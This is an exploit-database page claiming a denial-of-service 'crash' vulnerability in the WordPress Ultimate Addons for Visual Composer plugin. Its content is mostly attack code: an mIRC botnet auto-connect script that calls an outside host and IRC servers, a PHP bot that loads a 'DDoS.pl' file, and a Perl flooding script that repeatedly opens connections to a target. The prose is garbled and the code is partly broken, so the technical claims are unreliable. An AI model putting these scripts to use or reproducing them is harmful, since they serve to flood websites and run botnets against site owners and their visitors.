Wordpress Crash Ultimate Addons for Visual Composer vulnerability

2015.09.10
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

/************************************************************************************************ [+] Exploit Title : Wordpress Crash Ultimate Addons for Visual Composer vulnerability [+] Exploit Author : Ashiyane Digital Security Team [+] Tested on : Windows - Firefox [+] Vendor Homepage : http://codecanyon.net/item/ultimate-addons-for-visual-composer/6892199 [+] Version: 3.12.0 *************************************************************************************************/ ---------------------------------------- - vulnerability Ultimate_VC_Addons.php - ---------------------------------------- This Part visitors increased the pressure on the core WordPress,It is a denial of the exercise of visits However, we try to write 0day to the target affect scenarios Example : https://www.exploit-db.com/wp-content/plugins/Ultimate_VC_Addons/README Our present method by transferring the channel expansion as we botnet this is the syntax mSL that you have to your script connect to other networks. ---> { update_option(&#039;ultimate_vc_addons_redirect&#039;,true); $memory = ini_get(&#039;memory_limit&#039;); $allowed_memory = preg_replace("/[^0-9]/","",$memory)*1024*1024; $peak_memory = memory_get_peak_usage(true); if($allowed_memory - $peak_memory <= 14436352){ $pre = __(&#039;Unfortunately, plugin could not be activated. Not enough memory available.&#039;,&#039;ultimate_vc&#039;); $sub = __(&#039;Please contact&#039;, &#039;ultimate_vc&#039;); trigger_error( $pre.&#039; &#039;.$sub.&#039; <a href="https://www.brainstormforce.com/support/">&#039;.__(&#039;plugin support&#039;, &#039;ultimate_vc&#039;).&#039;</a>.&#039;,E_USER_ERROR ); } <--- --------------------------------------- ===================== = mSL Auto Connect: = ===================== on *:Connect: { /url -an www.exmple.com/bot.php } on *:START:{ server irc.network.com -i <nick> -j #channel,#channel server irc.network.com -i <nick> -j #channel,#channel } ===================== = PHP Bot = ===================== <?php error_reporting(0); $file1 = &#039;DDoS.pl&#039;; $file_headers = @get_headers($file1); if($file_headers[0] == &#039;HTTP/1.1 404 Not Found&#039;) { break; }else { $s=file_get_contents($file1); echo $s; } ?> ===================== = DDoS Perl = ===================== #!/usr/bin/perl # # Title : allowed memory size exhausted # Author : Ashiyane Digital Security Team # Improvment Code : Und3rgr0und use IO::Socket; $ip="127.0.0.1"; $port="80"; $counter =0; @attackpattern=("&#039;"); for ($x=0;$x<=600;$x++){ $headerLine="GET /Ultimate_VC_Addons/ HTTP/1.0nn"; @temp=split(/(/)/,$headerLine); foreach (@temp){ $replaceme=$_; foreach(@attackpattern){ $attack=$_; $newheaderline=$headerLine; $newheaderline=~ s/$replaceme/$attack/i; $remote=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ip, PeerPort=>$port, Timeout=>5) or die "Connection impossiblen"; print $remote $newheaderline; print "nRequest: ".$counter++." t".$newheaderline."n"; $remote->close; } } } --------------------------------------- Discoverd BY : Und3rgr0und


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top